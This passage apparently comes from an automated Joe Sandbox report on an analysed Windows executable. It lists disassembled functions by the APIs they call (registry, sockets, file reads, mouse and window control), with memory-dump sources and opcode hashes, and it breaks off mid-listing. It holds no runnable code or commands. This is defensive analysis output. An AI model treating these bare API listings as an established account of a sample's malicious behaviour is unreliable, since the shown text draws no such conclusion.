                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memcmp
                                                                                                                                                                        • String ID: j`,
                                                                                                                                                                        • API String ID: 2931989736-3978596512
                                                                                                                                                                        • Opcode ID: d3f9704257928c218d9f9a809dd3a1aedea2b5d74b1df4e955bf4a02573e4f9e
                                                                                                                                                                        • Instruction ID: abafd1014daad2dc411cf02f87154f8192857f7731a06182798e76e49d30e37e
                                                                                                                                                                        • Opcode Fuzzy Hash: d3f9704257928c218d9f9a809dd3a1aedea2b5d74b1df4e955bf4a02573e4f9e
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B01F9B16323057BD6186A104C56FABB31DAE10398F00012CFD05AA2C1E761ED31C6A1
                                                                                                                                                                        Function 002CE30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002CE328
                                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 002CE32F
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002CE345
                                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 002CE34C
                                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002CE390
                                                                                                                                                                        Strings
                                                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 002CE36D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLoadModuleString$Message
                                                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                        • API String ID: 4072794657-3128320259
                                                                                                                                                                        • Opcode ID: 9069bfeddaf667cdd4afab58c1bcec0e1151c34cab4e6deb7398514f98d7c7c0
                                                                                                                                                                        • Instruction ID: ecb51f5fb97d5d2e12abe260009d5ff8f721068ceae7c3ceac8a8db7097ec87e
                                                                                                                                                                        • Opcode Fuzzy Hash: 9069bfeddaf667cdd4afab58c1bcec0e1151c34cab4e6deb7398514f98d7c7c0
                                                                                                                                                                        • Instruction Fuzzy Hash: 250186F29002087FE711ABA4AD8DFFB776CDB08740F4145A5B70AE6041E6749E84CB71
                                                                                                                                                                        Function 002D1312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 002D1322
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000000,?), ref: 002D1334
                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,000001F6), ref: 002D1342
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 002D1350
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002D135F
                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 002D136F
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000), ref: 002D1376
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                                                        • Opcode ID: d80bc47b78e207689435c697b663b4ee9483e848d285677d5c0e422120e232a1
                                                                                                                                                                        • Instruction ID: fe8045a58a9f4ae2ffe2b287ffafddce8ebf060f9b056cbf2d3cc6c2bcc62197
                                                                                                                                                                        • Opcode Fuzzy Hash: d80bc47b78e207689435c697b663b4ee9483e848d285677d5c0e422120e232a1
                                                                                                                                                                        • Instruction Fuzzy Hash: E3F0C936042612BBD7411F54EE4DBEABB3ABF04352F401161F20191CA187749875DF90
                                                                                                                                                                        Function 002E26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002E281D
                                                                                                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002E283E
                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 002E284F
                                                                                                                                                                        • htons.WSOCK32(?,?,?,?,?), ref: 002E2938
                                                                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 002E28E9
                                                                                                                                                                          • Part of subcall function 002C433E: _strlen.LIBCMT ref: 002C4348
                                                                                                                                                                          • Part of subcall function 002E3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,002DF669), ref: 002E3C9D
                                                                                                                                                                        • _strlen.LIBCMT ref: 002E2992
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3203458085-0
                                                                                                                                                                        • Opcode ID: 68124659b46c207a6b3bc926d6c5edd74adce7fa69256ad0e718fd6dfbe76743
                                                                                                                                                                        • Instruction ID: c47a789dc912ed078d880e1c2752d62936328dced88075052b5b1dfcdf7dcaf5
                                                                                                                                                                        • Opcode Fuzzy Hash: 68124659b46c207a6b3bc926d6c5edd74adce7fa69256ad0e718fd6dfbe76743
                                                                                                                                                                        • Instruction Fuzzy Hash: ABB1F431114341EFD324EF25C885E2AB7E9AF84318F94855CF45A4B2E2DB31ED99CB91
                                                                                                                                                                        Function 00290527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __allrem.LIBCMT ref: 0029042A
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00290446
                                                                                                                                                                        • __allrem.LIBCMT ref: 0029045D
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0029047B
                                                                                                                                                                        • __allrem.LIBCMT ref: 00290492
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002904B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1992179935-0
                                                                                                                                                                        • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                        • Instruction ID: 9ef6900c86d69fee1572f0342707ef28397556dd93cbf12c42e20fe15b6a445f
                                                                                                                                                                        • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                        • Instruction Fuzzy Hash: 8581FB72A2070E9FEF20AF69CCC1B6A73E8AF55724F24412AF515D7681EB70DD208B54
                                                                                                                                                                        Function 00296571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00288649,00288649,?,?,?,002967C2,00000001,00000001,8BE85006), ref: 002965CB
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002967C2,00000001,00000001,8BE85006,?,?,?), ref: 00296651
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0029674B
                                                                                                                                                                        • __freea.LIBCMT ref: 00296758
                                                                                                                                                                          • Part of subcall function 00293B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00286A79,?,0000015D,?,?,?,?,002885B0,000000FF,00000000,?,?), ref: 00293BC5
                                                                                                                                                                        • __freea.LIBCMT ref: 00296761
                                                                                                                                                                        • __freea.LIBCMT ref: 00296786
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                                                        • Opcode ID: 34bd2bbaf991746af16467d1a107b38143cd79715c46ea147b1e72c66f0adb09
                                                                                                                                                                        • Instruction ID: dec57cace62ba6c97067704fb23b16531d7525c506a6633587cd05d2a071b575
                                                                                                                                                                        • Opcode Fuzzy Hash: 34bd2bbaf991746af16467d1a107b38143cd79715c46ea147b1e72c66f0adb09
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A51F672620207AFDF258EA4CC89EFBB7EAEB40754F154268FC14D6140EB74DC60D660
                                                                                                                                                                        Function 002EC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002ED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002EC10E,?,?), ref: 002ED415
                                                                                                                                                                          • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED451
                                                                                                                                                                          • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4C8
                                                                                                                                                                          • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4FE
                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002EC72A
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002EC785
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002EC7CA
                                                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002EC7F9
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 002EC853
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 002EC85F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1120388591-0
                                                                                                                                                                        • Opcode ID: 3fdb0f38e082a6dd561109dfd8b8832a402ebba6c8d4ce9c9c484b09cd7f4073
                                                                                                                                                                        • Instruction ID: ed88a772d59e6949f8212a337516b6948162437c75d713a7aaf51315bcba4e6d
                                                                                                                                                                        • Opcode Fuzzy Hash: 3fdb0f38e082a6dd561109dfd8b8832a402ebba6c8d4ce9c9c484b09cd7f4073
                                                                                                                                                                        • Instruction Fuzzy Hash: ED81C230128281AFC715EF65C885E2ABBE9FF84308F54446CF4598B2A2CB31ED56CF91
                                                                                                                                                                        Function 002C009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • VariantInit.OLEAUT32(00000035), ref: 002C00A9
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 002C0150
                                                                                                                                                                        • VariantCopy.OLEAUT32(002C0354,00000000), ref: 002C0179
                                                                                                                                                                        • VariantClear.OLEAUT32(002C0354), ref: 002C019D
                                                                                                                                                                        • VariantCopy.OLEAUT32(002C0354,00000000), ref: 002C01A1
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 002C01AB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3859894641-0
                                                                                                                                                                        • Opcode ID: f2964ea2dc73765ea44dec4f2b30e686dc88f4c4220de5983ec1608243dc822c
                                                                                                                                                                        • Instruction ID: 55034c701dfdd13124dd5c0ce73c839dc76a3910194d29c9542579609124fe94
                                                                                                                                                                        • Opcode Fuzzy Hash: f2964ea2dc73765ea44dec4f2b30e686dc88f4c4220de5983ec1608243dc822c
                                                                                                                                                                        • Instruction Fuzzy Hash: DD51D935A30310E6CF10AF6498C9F29B3A5EF45320F24854BED09DF296DAB09C64CF56
                                                                                                                                                                        Function 002D9B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002641EA: _wcslen.LIBCMT ref: 002641EF
                                                                                                                                                                          • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
                                                                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 002D9F2A
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D9F4B
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D9F72
                                                                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 002D9FCA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                        • String ID: X
                                                                                                                                                                        • API String ID: 83654149-3081909835
                                                                                                                                                                        • Opcode ID: 6458f1ad786be63c77126d42d19213ad85dee8479efe698e3135656ef73e6bc0
                                                                                                                                                                        • Instruction ID: f784d507239e9d35d5630110cc3a28af4603d33605985fa55603d284b22b1fad
                                                                                                                                                                        • Opcode Fuzzy Hash: 6458f1ad786be63c77126d42d19213ad85dee8479efe698e3135656ef73e6bc0
                                                                                                                                                                        • Instruction Fuzzy Hash: 2BE192315243418FC724EF24C485A6AB7E5BF88314F14496EF8899B3A2DB31DD95CF92
                                                                                                                                                                        Function 002D6ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D6F21
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 002D707E
                                                                                                                                                                        • CoCreateInstance.OLE32(00300CC4,00000000,00000001,00300B34,?), ref: 002D7095
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 002D7319
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                        • String ID: .lnk
                                                                                                                                                                        • API String ID: 886957087-24824748
                                                                                                                                                                        • Opcode ID: 2b18c5b79a29724f586b8a2371ab4628dc914f9193ca19f932a3532454da4476
                                                                                                                                                                        • Instruction ID: 4606e0590e3b2f23b58c1971d2e4ca313603af231f6207ed7bd88dab54992c76
                                                                                                                                                                        • Opcode Fuzzy Hash: 2b18c5b79a29724f586b8a2371ab4628dc914f9193ca19f932a3532454da4476
                                                                                                                                                                        • Instruction Fuzzy Hash: 13D14A71518201AFD304EF24C881E6BB7E8FF98704F50496DF5858B2A2EB71ED95CB92
                                                                                                                                                                        Function 002D1196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 002D11B3
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 002D11EE
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 002D120A
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 002D1283
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002D129A
                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 002D12C8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3368777196-0
                                                                                                                                                                        • Opcode ID: b68530299275ced5dac732fbde0a6afca8152449c4f0a55a4bd164d728c2a23f
                                                                                                                                                                        • Instruction ID: 21b2335d79e16075b6769f6af7042ca320e6be650533f26e2f6da31824660527
                                                                                                                                                                        • Opcode Fuzzy Hash: b68530299275ced5dac732fbde0a6afca8152449c4f0a55a4bd164d728c2a23f
                                                                                                                                                                        • Instruction Fuzzy Hash: 67416A75A10205EBDF04AF54DCC9AAAB7B9FF04310F1040A5ED049A29ADB30EE65DFA0
                                                                                                                                                                        Function 002F8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,002BFBEF,00000000,?,?,00000000,?,002A39E2,00000004,00000000,00000000), ref: 002F8CA7
                                                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 002F8CCD
                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 002F8D2C
                                                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 002F8D40
                                                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 002F8D66
                                                                                                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 002F8D8A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                                                        • Opcode ID: dc08b398e35fe19d5778395ac9dee62a8cd4fbfdae42ed9fcba8d2797a9b7576
                                                                                                                                                                        • Instruction ID: 8690d4553d573e39f1b5a6f50bbd23c875276606c625a56cf747b4ce6ced5208
                                                                                                                                                                        • Opcode Fuzzy Hash: dc08b398e35fe19d5778395ac9dee62a8cd4fbfdae42ed9fcba8d2797a9b7576
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D419430601249AFDB2ADF24D889BB6FBF1FB45394F144075E6194B2A2CB316865CF50
                                                                                                                                                                        Function 002E2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 002E2D45
                                                                                                                                                                          • Part of subcall function 002DEF33: GetWindowRect.USER32(?,?), ref: 002DEF4B
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 002E2D6F
                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 002E2D76
                                                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 002E2DB2
                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 002E2DDE
                                                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002E2E3C
                                                                                                                                                                        Memory Dump Source
